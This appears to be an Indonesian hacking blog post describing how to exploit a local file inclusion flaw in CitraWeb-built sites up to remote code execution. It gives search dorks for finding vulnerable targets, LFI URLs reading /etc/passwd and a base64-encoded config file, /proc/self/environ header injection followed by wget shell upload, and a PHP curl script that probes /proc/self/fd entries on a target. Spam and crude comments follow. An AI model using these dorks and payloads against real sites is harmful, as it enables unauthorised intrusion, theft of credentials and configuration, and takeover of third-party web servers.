CitraWeb LFI to RCE




CXSECURITY : cxsecurity.com/issue/WLB-2019060011
> Dorking Dolo
DORK:
inurl:/cni-content/*/*.jpg
inurl:/cni-content/*/
intext:Designed & Developed by Citraweb Nusa Info Media
> Asumsikan w udah dpt target vuln check vuln gmna? host.com/system/ajax/?/etc/passwd
> Kita coba buka /proc/self/envrion
Coba lihat ada HTTP Header Kita :d tinggal ganti http header :v bisa User Agent , Accept, Cookie, dsb
Kita coba dengan Accept ea
Tinggal Upload Shell Deh :D caranya? wget aweokwaoek :v
klo /proc/self/environ gk ada gmna :D
bisa ngambil config :D caranya?
/system/ajax/?php://filter/convert.base64-encode/resource=cni-system/config/config.php
atau bisa /proc/self/fd/{NUMBER}
atau /home/{USER}/access-logs/{WEBSITE}

Untuk /proc/self/fd/{NUMBER} w pnya toolsnya :D
<?php
for($i=0; $i <= 1000; $i++){
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, "https://{WEBSITE HERE}system/ajax/?php://filter/convert.base64-encode/resource=/proc/self/fd/$i");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  $c = curl_exec($ch);
  $http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  if($http == 200){
    echo $i. " -> Success\n";
  }
  else{
    echo $i . " -> Failed\n";
  }
}

- RINTOD -

3 Responses to "CitraWeb LFI to RCE"

  1. code buat wgetnya tulis ajg ,jgn tawa bgst :v

    ReplyDelete
  2. I am a new user of this site so here i saw multiple articles and posts posted by this site,I curious more interest in some of them hope you will give more information on this topics in your next articles. whole house water filter

    ReplyDelete
  3. I just couldn't leave your website before telling you that I truly enjoyed the top quality info you present to your visitors? Will be back again frequently to check up on new posts. Visit website

    ReplyDelete

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel